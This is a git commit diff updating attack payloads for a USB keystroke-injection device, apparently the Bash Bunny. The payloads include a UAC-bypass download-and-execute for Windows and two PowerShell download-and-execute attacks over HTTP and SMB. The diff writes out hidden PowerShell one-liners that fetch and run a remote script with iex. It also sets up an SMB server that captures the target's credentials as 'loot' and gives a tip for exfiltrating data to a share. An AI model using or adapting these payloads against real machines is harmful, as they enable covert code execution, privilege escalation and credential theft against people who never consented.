Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors
2025-10-29 16:58:25 +00:00 · 2017-10-24 20:10:17 -04:00
parent c0ab8d3e88
commit 5a77792c1d
56 changed files with 438 additions and 395 deletions
--- a/payloads/library/execution/exe_UACBypassD&E/payload.txt
+++ b/payloads/library/execution/exe_UACBypassD&E/payload.txt
@@ -2,21 +2,24 @@
 # Author:        Skiddie
 # Version:       1.1
 # Target:        Windows
-# 
+#
 # Download and executes any binary executable with administrator privileges WITHOUT
 # prompting the user for administrator rights (aka UAC bypass/exploit)
-# Please define URL and SAVEFILENAME in the a.vbs script 
+# Please define URL and SAVEFILENAME in the a.vbs script
 # Target does need internet connection
 # Works on Windows 7 - Windows 10
-# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges 
-# However from what i am aware version 7,8 and 8.1 are still effected 
+# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
+# However from what i am aware version 7,8 and 8.1 are still effected
 # Currently fastest download and execute for HID attacks to date. (with UAC bypass)

 #Define your bunny storage stick name
 DRIVER_LABEL='BashBunny'

 #RED means starting
-LED R
+LED SETUP
+
+#Gets File locations
+GET SWITCH_POSITION

 #We are a keyboard
 ATTACKMODE HID STORAGE
@@ -32,4 +35,3 @@ LED G
 #If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
 #QUACK DELAY 4500
 #shutdown 0
-
--- a/payloads/library/execution/psh_DownloadExecSMB/psh.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/psh.txt
--- a/payloads/library/execution/psh_DownloadExec/payload.txt
+++ b/payloads/library/execution/psh_DownloadExec/payload.txt
@@ -8,51 +8,49 @@
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.3
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny web server - ensure psh.txt exists in payload directory
-# 
+# Quick HID attack to retrieve and run powershell payload from BashBunny web server
+# ensure p.txt (your powershell payload) exists in payload directory
+#
 # | Attack Stage        | Description                              |
 # | ------------------- | ---------------------------------------- |
 # | Stage 1             | Running Initial Powershell Commands      |
-# | Stage 3             | Delivering powershell payload            |
+# | Stage 2             | Delivering powershell payload            |
 #

 ATTACKMODE RNDIS_ETHERNET HID
 LED SETUP
+REQUIRETOOL gohttp

 GET HOST_IP
 GET SWITCH_POSITION

-# Set working dir
-PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-SERVER_LOG=$PAYLOAD_DIR/server.log
+# DEFINE DIRECTORIES
+PAYLOAD_DIR=/root/udisk/payloads/${SWITCH_POSITION}
+SERVER_LOG=/tmp/server.log

-# Fresh Server Log
-rm -f $SERVER_LOG
+# SERVER LOG
+rm -f ${SERVER_LOG}

-# Check for gohttp
-REQUIRETOOL gohttp
-
-# Start web server
+# START HTTP SERVER
 iptables -A OUTPUT -p udp --dport 53 -j DROP # disallow outgoing dns requests so server starts immediately
-/usr/bin/gohttp -p 80 -d $PAYLOAD_DIR  > $SERVER_LOG 2>&1 &
+/tools/gohttp/gohttp -p 80 -d /tmp/ > ${SERVER_LOG} 2>&1 &

-# Check for psh.txt
-if [ ! -f $PAYLOAD_DIR/psh.txt ]; then
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
    LED FAIL2
    exit 1
 fi
+cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp

-# Attack HID
+# STAGE 1 - POWERSHELL
 LED STAGE1

-# Attack (abbreviations to allow run execution)
-RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('$HOST_IP','80')).Connected) {iex \$web.DownloadString('http://$HOST_IP/psh.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
 # Remove tracks in the psh payload if you wish

-# Attack Ethernet
+# STAGE 2 - WAIT
 LED STAGE2
-
-while ! grep -Fq "GET \"/DONE\"" $SERVER_LOG; do
+while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
    sleep .5
 done

--- a/payloads/library/execution/psh_DownloadExec/readme.md
+++ b/payloads/library/execution/psh_DownloadExec/readme.md
@@ -14,7 +14,7 @@ Quick HID attack to retrieve and run powershell payload from BashBunny web serve

 ## Configuration

-Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.
+Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.

 ## Requirements

@@ -31,5 +31,5 @@ See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info
 | Attack Stage        | Description                              |
 | ------------------- | ---------------------------------------- |
 | Stage 1             | Running Initial Powershell Commands      |
-| Stage 3             | Delivering powershell payload            |
-```
+| Stage 2             | Delivering powershell payload            |
+```
--- a/payloads/library/execution/psh_DownloadExecSMB/p.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/p.txt
@@ -1,3 +1,2 @@
 New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
 Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
-
--- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt
+++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt
@@ -2,23 +2,23 @@
 #
 # Title:         Powershell Download and Execute SMB
 # Author:        LowValueTarget
-# Version:       1.2
+# Version:       2.0
 # Category:      Powershell
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.2
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
-# Ensure psh.txt exists in payload directory  
+# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by  are stored as loot.
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Requires Impacket is installed (python ./impacket/setup.py install)  
+# Required tools: impacket
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|
 # | Stage 1             | Powershell                    |
 # | Stage 2             | Delivering powershell payload |
 #
-
 ATTACKMODE RNDIS_ETHERNET HID

 # SETUP
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP

+# DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-# Check for psh.txt
-if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
+LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
+
+mkdir -p /tmp/{l,p}
+
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
    LED FAIL
    exit 1
 fi
-cp -R ${PAYLOAD_DIR}/* /tmp/
+cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp

-LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
-# Setup named logs in loot directory
-mkdir -p ${LOOTDIR}
+# GET HOSTNAME
 HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
+[[ -z "${HOST}" ]] && HOST="noname"
+COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
 COUNT=$((COUNT+1))
-mkdir -p ${LOOTDIR}/${HOST}-$COUNT
+mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
+LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}

-# Log file
-LOGFILE=psh_smb.log
+# START SMB SERVER
+LOGFILE=/tmp/l/psh_downloadsmb.log
+touch ${LOGFILE}
+python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &

-# Start SMB Server
-mkdir -p /loot
-python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-
-# STAGE 1 - Powershell
+# STAGE 1 - POWERSHELL
 LED STAGE1
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
+# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
+# TIP: Remove tracks in the psh payload if you wish

-RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
-# Remove tracks in the psh payload if you wish
-
-# STAGE 2 - Wait until payload retrieved
-# Wait until payload is retrieved
+# STAGE 2 - HURRY UP AND WAIT
 LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done

 # CLEANUP
 LED CLEANUP

-# Move loot to mass storage
-mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
-rm /loot/${LOGFILE}
+# STASH THE LOOT
+mv /tmp/l/* ${LOOTDIR_BB}/
+rm -rf /tmp/{l,p}
 # Sync file system
 sync

--- a/payloads/library/execution/psh_DownloadExecSMB/readme.md
+++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md
@@ -10,16 +10,20 @@

 ## Description

-Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
+Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.  

 ## Configuration

-* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
-* Requires Impacket is installed (python ./impacket/setup.py install)  
+* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
+* Requires Impacket
+
+__Installation__
+
+See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/

 ## STATUS

 | Attack Stage        | Description                   |
 | ------------------- | ------------------------------|
 | Stage 1             | Powershell                    |
-| Stage 2             | Delivering powershell payload |
+| Stage 2             | Delivering powershell payload |